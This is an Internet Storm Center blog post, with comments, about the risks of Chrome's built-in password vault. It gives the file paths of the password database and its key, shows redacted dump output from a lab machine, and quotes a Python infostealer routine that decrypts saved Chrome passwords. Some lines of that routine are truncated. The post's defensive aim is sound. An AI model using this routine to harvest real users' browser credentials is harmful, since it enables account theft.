Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Use Your Browser Internal Password Vault... or Not? - SANS Internet Storm Center SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Use Your Browser Internal Password Vault... or Not?

Passwords... a so hot topic! Recently big players (Microsoft, Apple & Google) announced that they would like to suppress (or, at least, reduce) the use of classic passwords[1]. In the meantime, they remain the most common way to authenticate users against many online services. Modern Browsers offer lightweight password management tools ("vaults") that help users to save their passwords in a central repository. So they don't have to remember them, and they follow the golden rule that we, infosec people, are recommending for a long time: to not share passwords across services. But it is really safe?

I'm involved in a security incident where some administrative accounts for web applications have been probably leaked. During the investigations, I wrote a quick YARA rule to search for the suspicious accounts across files on the developers' computers. And I found a lot of them stored in the Chrome password databases. The default path for this file is:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default|Login Data

This file is an SQLite database. Hopefully, passwords stored in this file are encrypted but it's pretty simple to decrypt them. But the AES key that is used to encrypt the passwords is stored in a JSON file:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State

I won't explain here how to decode this key and use it to decrypt all passwords. This is pretty straightforward to be performed in Python. Here is an example of dumping passwords from a lab Windows machine with Chrome:

Origin URL: https://selfoss.xxxxxxxxxxxx/
Action URL: https://selfoss.xxxxxxxxxxxx/
Username: xavier
Password: xxxxxxxx
Creation date: 2022-05-17 08:26:16.687562
Last Used: 2022-05-17 08:26:13.094214
Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/
Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php
Username: admin
Password: xxxxxxxxxxxxxxxxxxxx
Creation date: 2022-05-17 08:49:44.385977
Last Used: 2022-05-17 08:49:41.002207

If it's so easy to extract passwords from Chrome, many malware samples also implement this technique and exfiltrate your passwords. Here is a sample found this morning on VT:

def grabPassword(self):
    master_key = self.get_master_key(
        self.appdata+'\\Google\\Chrome\\User Data\\Local State')
    login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
    login = self.dir+self.sep+"Loginvault1.db"

    shutil.copy2(login_db, login)
    conn = sqlite3.connect(login)
    cursor = conn.cursor()
    with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
            "SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = self.decrypt_val(
                encrypted_password, master_key)
            if url != "":
                    f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")

My recommendation is to not store your password in these browser vaults but use a real password manager instead! Most of them have plugins available to work with all common browsers and provide the same ease of use! Stay safe!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS Amsterdam August 2022


697 Posts
ISC Handler
May 17th 2022
That seems so weird that chrome stores the encryption key in a clear text file. Any idea why they don't use Credential Manager on windows or keychain on macos?
Is Apple Safari any better?

4 Posts
Safari (which is only available on MacOS/iOS), uses the operating system's "Keychain" which is better. Data is encrypted using your iCloud credentials.

Firefox uses an optional master password.

For Chrome, you may be able to use a "master password" as well.

4504 Posts
ISC Handler
Did you investigate this for Edge and Firefox?

Sign Up for Free or Log In to start participating in the conversation!